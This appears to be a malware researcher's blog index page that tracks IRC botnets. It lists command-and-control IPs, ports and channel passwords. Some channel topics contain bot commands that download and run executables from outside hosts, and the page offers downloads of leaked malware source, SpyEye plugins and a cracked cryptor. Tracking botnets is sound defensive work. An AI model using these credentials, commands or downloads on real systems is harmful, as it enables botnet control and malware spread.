Remote Host Port Number 119.59.99.160 2345 NICK New[USA|00|P|98932] PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. USER XP-6625 * 0 :COMPUTERNAME MODE New[USA|00|P|98932] -ix JOIN #!loco! PONG 22 MOTD Now talking in #!loco! Topic On: [ #!loco! ] [ .m.s|.m.e Foto http://goo.gl/JfWS5?= ] Topic By: [ wd11 ] hostingRead more...
timununyeri.co.cc(irc botnet hosted in Turkey Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti)
timununyeri.co.cc 94.102.0.65 Opened listening TCP connection on port: 113 C&C Server: 94.102.0.65:6667 Server Password: Username: arpsc Nickname: DEU|43304 Channel: #hack (Password: timu) Channeltopic: : Now talking in #hack Topic On: [ #hack ] [ .dl http://www.osmarimoveis-rs.com.br/ex.exe c:/ex.exe 1 ] Topic By: [ infeCTeD ] hosting infos: http://whois.domaintools.com/94.102.0.65
174.140.165.107(irc botnet hosted in United States Portland Directspace Networks Llc)
Remote Host Port Number 174.140.165.107 6667 PASS mystic NICK New{US-XP-x86}4733047 USER 4733047 “” “4733047” :4733047 MODE New{US-XP-x86}4733047 +iMm JOIN #Boss PONG :Mystical.gov hosting infos: http://whois.domaintools.com/174.140.165.107
vOlk HTTP Botnet – [+]Pharming ★ [ver 4.0] (VB Source)
Another HTTP malware (currently for sell in heckers board) Source leaked to public (have to say is very bad and VB language so u have to be a real hecker to spend 35$ for this garbage) Source may be in handy to AV Companies lol Download it here
proxysafe.mrkva.su(irc botnet hosted in Netherlands Dediserv Dedicated Servers Sp. Z O.o)
This is another reptile mod wich spreads better then ngrBot wich is more famous because being for sell around proxysafe.mrkva.su 212.7.214.43 C&C Server: 212.7.214.43:2345 Server Password: Username: x Nickname: n[DEU|XP]7480782 Channel: #!proxy! (Password: ) Channeltopic: exe file for analysis: Download Download1 Download2 hosting infos: http://whois.domaintools.com/212.7.214.43
ColdSeal 5.4.1 Ultimate Release–FWB++ CRACKED
About the “coder” About ColdSeal Cryptor ColdSeal Cryptor this guy claim to be computer engineer …lol The tool is used mainly to protect malwares like RAT’s,Bots,Trojans alot of hf hecker’s are buying this and this “coder” is making alot of money from this dirty busines Price: Pay to Account U2903909 (ToXiiC) via LR Amount $70.00Read more...
Downloader.Generic, Downloader, Trojan.Win32.Scar.rfw, BackDoor-DKA(hosted in United States Vpls Inc. D/b/a Krypt Technologies)
Interessing malware here some infos i got from the exe: a.ip-163.com DNS_TYPE_A 174.139.61.74 what it does: Write to foreign memory areas: This executable tampers with the execution of another process. Performs File Modification and Destruction: The executable modifies and destructs files which are not temporary. Start/Install windows service: This executable starts a windows service. ServicesRead more...
31.186.102.186(irc botnet hosted in Russian Federation Selectel Ltd)
Remote Host Port Number 199.15.234.7 80 31.186.102.186 8765 PASS secret NICK n{US|XPa}vhxkqvn USER vhxkqvn 0 0 :vhxkqvn JOIN #GODS secret hosting infos: http://whois.domaintools.com/31.186.102.186
SpyEye Plugins
Here some plugins used from the celebre malware SpyEye found by formatme and allready public into russian forums Reversing guys will have good time with this package Guess what ? Theyre backdoored like everything leaked to public so be carefull Download
www.merkurvideo.com(irc botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)
Domains used to control bots: www.facebookvideocentral.com 46.45.164.166 www.merkurvideo.com 46.45.164.166 www.pr0.net 74.206.242.164 C&C Server: 46.45.164.166:81 Server Password: Username: SP3-431 Nickname: [00_DEU_XP_6037696] Channel: #i (Password: ) Channeltopic: :.asc -S -s |.http http://46.45.164.165/iii.exe |.asc exp_all 15 5 0 -c -e |.asc exp_all 15 5 0 -b -r -e |.asc exp_all 15 5 0 -c |.asc exp_all 10 5Read more...